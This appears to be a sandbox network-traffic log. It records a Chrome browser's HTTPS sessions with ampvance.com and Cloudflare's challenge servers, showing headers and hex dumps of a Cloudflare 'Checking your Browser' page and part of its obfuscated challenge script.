                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      referrer-policy: same-origin
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d617a504235-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:36 UTC182INData Raw: 37 62 30 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e
                                                      Data Ascii: 7b0f<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta n
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 63 6d 67 2f 31 2f 77 68 30 45 30 53 58 59 6e 78 36 70 54 42 64 4a 57 25 32 46 6c 39 32 36 49 25 32 42 50 52 55 70 6c 52 64 74 51 7a 33 4b 39 6c 48 58 73 25 32 46 73 25 33 44 22 20 61 73 3d 22 69 6d 61 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 42 72 6f 77 73 65 72 26 68 65 6c 6c 69 70 3b 3c 2f
                                                      Data Ascii: ame="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="preload" href="/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D" as="image"> <title>Checking your Browser&hellip;</
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 72 6f 62 6f 74 6f 2c 20 6f 78 79 67 65 6e 2c 20 75 62 75 6e 74 75 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 31 36 70 78 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 35 3b 0a 20 20 63 6f 6c 6f 72 3a 20
                                                      Data Ascii: nt, "Segoe UI", roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-serif; font-size: 14px; font-weight: 400; -webkit-font-smoothing: antialiased; font-style: normal;}h1 { margin: 16px 0; text-align: center; line-height: 1.25; color:
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 32 34 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 32 34 32 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 35 2c 20 30 2c 20 30 2e 34 35 2c 20 31 29 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 35 73 3b 0a 7d 0a 0a
                                                      Data Ascii: th: 6px; stroke: #f8f8f8; stroke-miterlimit: 10;}#success-icon .p1 { stroke-dasharray: 242; stroke-dashoffset: 242; box-shadow: inset 0 0 0 #038127; animation: stroke 0.4s cubic-bezier(0.65, 0, 0.45, 1) forwards; animation-delay: 0.5s;}
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 62 61 64 34 31 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62
                                                      Data Ascii: 22;}.theme-dark .ctp-checkbox-label input:focus ~ .mark, .theme-dark .ctp-checkbox-label input:active ~ .mark { border: 2px solid #fbad41;}.theme-dark .ctp-checkbox-label input:checked ~ .mark { background-color: #6d6d6d;}.theme-dark .ctp-checkb
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d
                                                      Data Ascii: per-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.theme-dark #fr-helper-loop-link:visited,.theme-dark #fr-helper-loop-link:link { color: #bbb;}.theme-dark #fr-helper-link:active, .theme-dark #fr-
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 20 61 3a 66 6f 63 75 73 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 36 36 33 37 39 3b 0a 7d 0a 0a 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 36 70 78 3b 0a 7d 0a 0a 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69
                                                      Data Ascii: a:focus,#challenge-error-text a:active,#challenge-error-text a:hover,#challenge-error-text a:focus { color: #166379;}#logo { margin-bottom: 1px; height: 26px;}.failure-circle { stroke-dasharray: 166; stroke-dashoffset: 166; stroke-wi
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6c 65 66 74 3a 20 38 70 78 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 30 20 34 70 78 20 34 70 78 20 30 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 32 70 78 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 70 6f 73
                                                      Data Ascii: }.ctp-checkbox-label input:checked ~ .mark::after { top: 3px; left: 8px; transform: rotate(45deg) scale(1); border: solid #c44d0e; border-width: 0 4px 4px 0; border-radius: 0; width: 6px; height: 12px;}.ctp-checkbox-label .mark { pos
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77
                                                      Data Ascii: g-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.size-compact #challenge-error-title { margin-top: 3px; width: auto;}.size-compact #fail { display: flex; flex-flow: row
                                                      2024-03-05 13:24:36 UTC1369INData Raw: 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68
                                                      Data Ascii: ss-icon { left: 86px;}.rtl .size-compact #fail-icon { left: 86px;}.rtl .size-compact #spinner-icon { left: 86px;}.rtl .size-compact #expired-icon { left: 86px;}.rtl .size-compact #expired { margin-top: 0; margin-left: 0;}.rtl .ctp-ch


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.549725104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:36 UTC474OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dc HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:36 UTC709INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:24:36 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: GHILO+wC6EMw2CdxnXPG0A==$dcWj9OWIu5BIeaOhw3+yzA==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WdIwWs%2BX0oMxxcH%2BQYYkeTxM%2FcqSUG5nC2m%2F0aUGuJm2mfNP3NORWUqfyIvlr3hVjk6Hq6AtOUwuWBlkFQZfweDLajjpLY5Ko9e4fDhEU66tqbeZmNKcBnPPTBRbNp8%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d624a624394-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:36 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:24:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.549726104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:37 UTC711OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=85fa6d617a504235 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:37 UTC335INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:37 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d646d9243e0-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:37 UTC1034INData Raw: 37 65 36 33 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 6b 2c 66 7a 2c 66 41 2c 66 48 2c 66 4c 2c 66 50 2c 66 54 2c 66 55 2c 67 6b 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 64 2c 68 72 2c 68 45 2c 68 4a 2c 68 4b 2c 68 57 2c 69 35 2c 69 39 2c 69 61 2c
                                                      Data Ascii: 7e63window._cf_chl_opt.uaO=false;~function(ik,fz,fA,fH,fL,fP,fT,fU,gk,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hd,hr,hE,hJ,hK,hW,i5,i9,ia,
                                                      2024-03-05 13:24:37 UTC1369INData Raw: 5b 69 54 28 31 39 34 31 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 69 55 29 7b 69 55 3d 69 54 2c 68 5e 3d 6a 5b 69 55 28 33 38 36 29 5d 28 6d 29 7d 29 2c 63 3d 66 7a 5b 69 54 28 31 33 36 34 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 69 54 28 33 30 36 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 69 54 28 33 38 36 29 5d 28 2b 2b 67 29 29 3b 69 5b 69 54 28 31 37 31 36 29 5d 28 53 74 72 69 6e 67 5b 69 54 28 31 35 31 39 29 5d 28 66 5b 69 54 28 31 32 39 36 29 5d 28 66 5b 69 54 28 34 31 38 29 5d 28 66 5b 69 54 28 35 31 30 29 5d 28 66 5b 69 54 28 38 39 37 29 5d 28 6b 2c 32 35 35 29 2c 68 29 2d 67 25 36 35 35 33 35 2c 36 35 35 33 35 29 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 69 54 28 31 33 30 37 29 5d 28 27 27 29 7d 2c 66
                                                      Data Ascii: [iT(1941)](/./g,function(l,m,iU){iU=iT,h^=j[iU(386)](m)}),c=fz[iT(1364)](c),i=[],g=-1;!f[iT(306)](isNaN,k=c[iT(386)](++g));i[iT(1716)](String[iT(1519)](f[iT(1296)](f[iT(418)](f[iT(510)](f[iT(897)](k,255),h)-g%65535,65535),255))));return i[iT(1307)]('')},f
                                                      2024-03-05 13:24:37 UTC1369INData Raw: 28 6a 5b 6a 45 28 31 39 30 31 29 5d 21 3d 3d 6a 45 28 31 37 32 30 29 29 74 72 79 7b 72 65 74 75 72 6e 21 21 65 5b 6a 45 28 39 32 33 29 5d 7d 63 61 74 63 68 28 46 29 7b 72 65 74 75 72 6e 21 31 7d 65 6c 73 65 20 66 6f 72 28 6b 3d 6a 45 28 37 34 30 29 5b 6a 45 28 37 32 34 29 5d 28 27 7c 27 29 2c 6c 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6b 5b 6c 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 43 5b 6a 45 28 31 39 38 30 29 5d 28 6a 5b 6a 45 28 33 39 33 29 5d 28 6a 5b 6a 45 28 33 39 33 29 5d 28 27 76 5f 27 2b 66 7a 5b 6a 45 28 31 39 33 36 29 5d 5b 6a 45 28 38 32 37 29 5d 2c 27 3d 27 29 2c 42 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6d 3d 6a 45 28 38 32 31 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6f 3d 28 6e 3d 7b 7d 2c 6e
                                                      Data Ascii: (j[jE(1901)]!==jE(1720))try{return!!e[jE(923)]}catch(F){return!1}else for(k=jE(740)[jE(724)]('|'),l=0;!![];){switch(k[l++]){case'0':C[jE(1980)](j[jE(393)](j[jE(393)]('v_'+fz[jE(1936)][jE(827)],'='),B));continue;case'1':m=jE(821);continue;case'2':o=(n={},n
                                                      2024-03-05 13:24:37 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6f 5e 73 7d 2c 27 6c 70 6b 67 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 6a 47 29 7b 72 65 74 75 72 6e 20 6a 47 3d 62 2c 6a 5b 6a 47 28 39 31 30 29 5d 28 6f 2c 73 29 7d 2c 27 57 71 54 6a 62 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 6a 48 29 7b 72 65 74 75 72 6e 20 6a 48 3d 62 2c 6a 5b 6a 48 28 31 31 36 36 29 5d 28 6f 2c 73 29 7d 2c 27 71 50 4c 4b 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 2c 6a 49 29 7b 72 65 74 75 72 6e 20 6a 49 3d 62 2c 6a 5b 6a 49 28 31 30 34 31 29 5d 28 6f 2c 73 29 7d 2c 27 7a 6d 6b 49 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6f 2d 73 7d 7d 2c 6a 4a 28 31 32 35 31 29 3d 3d 3d 6a 5b 6a 4a 28 31 30 33 34 29 5d 29 3f 66 7a 5b 6a 4a 28 31 33
                                                      Data Ascii: nction(o,s){return o^s},'lpkgf':function(o,s,jG){return jG=b,j[jG(910)](o,s)},'WqTjb':function(o,s,jH){return jH=b,j[jH(1166)](o,s)},'qPLKp':function(o,s,jI){return jI=b,j[jI(1041)](o,s)},'zmkIK':function(o,s){return o-s}},jJ(1251)===j[jJ(1034)])?fz[jJ(13
                                                      2024-03-05 13:24:37 UTC1369INData Raw: 3a 6a 4e 28 33 32 39 29 2c 27 6b 7a 50 6d 66 27 3a 6a 4e 28 31 31 31 38 29 2c 27 75 69 64 41 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 3d 3d 3d 6d 7d 2c 27 78 52 4c 65 52 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 3d 3d 3d 6c 7d 2c 27 4b 52 58 6d 77 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 7c 7c 6d 7d 2c 27 46 4b 41 61 48 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 3e 3d 6d 7d 2c 27 64 67 73 4e 46 27 3a 6a 4e 28 32 35 39 29 2c 27 4f 56 69 4f 48 27 3a 6a 4e 28 38 32 31 29 2c 27 6a 71 64 54 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 55 6c 73 76 63 27 3a 6a 4e 28 32 34 31 29 2c 27 6c 73 6d 41
                                                      Data Ascii: :jN(329),'kzPmf':jN(1118),'uidAK':function(l,m){return l===m},'xRLeR':function(l,m){return m===l},'KRXmw':function(l,m){return l||m},'FKAaH':function(l,m){return l>=m},'dgsNF':jN(259),'OViOH':jN(821),'jqdTK':function(l,m){return l+m},'Ulsvc':jN(241),'lsmA
                                                      2024-03-05 13:24:37 UTC1369INData Raw: 49 64 27 3a 66 7a 5b 6a 52 28 31 39 33 36 29 5d 5b 6a 52 28 31 36 36 38 29 5d 2c 27 65 76 65 6e 74 27 3a 6a 52 28 39 33 39 29 2c 27 72 63 56 27 3a 66 7a 5b 6a 52 28 31 39 33 36 29 5d 5b 6a 52 28 31 39 33 39 29 5d 2c 27 63 6f 64 65 27 3a 6d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 7a 5b 6a 52 28 31 39 33 36 29 5d 5b 6a 52 28 31 30 33 36 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 66 7a 5b 6a 52 28 31 39 33 36 29 5d 5b 6a 52 28 31 34 38 36 29 5d 7d 2c 27 2a 27 29 29 29 3b 69 66 28 69 5b 6a 52 28 34 39 30 29 5d 21 3d 32 30 30 26 26 69 5b 6a 52 28 34 39 30 29 5d 21 3d 33 30 34 29 72 65 74 75 72 6e 20 66 5b 6a 52 28 31 33 33 37 29 5d 28 66 5b 6a 52 28 37 37 30 29 5d 2c 6a 52 28 31 31 31 38 29 29 3f 76 6f 69 64 20 68 28 29 3a 28 74 68 69 73 5b 6a 52 28 32 30 32
                                                      Data Ascii: Id':fz[jR(1936)][jR(1668)],'event':jR(939),'rcV':fz[jR(1936)][jR(1939)],'code':m,'cfChlOut':fz[jR(1936)][jR(1036)],'cfChlOutS':fz[jR(1936)][jR(1486)]},'*')));if(i[jR(490)]!=200&&i[jR(490)]!=304)return f[jR(1337)](f[jR(770)],jR(1118))?void h():(this[jR(202
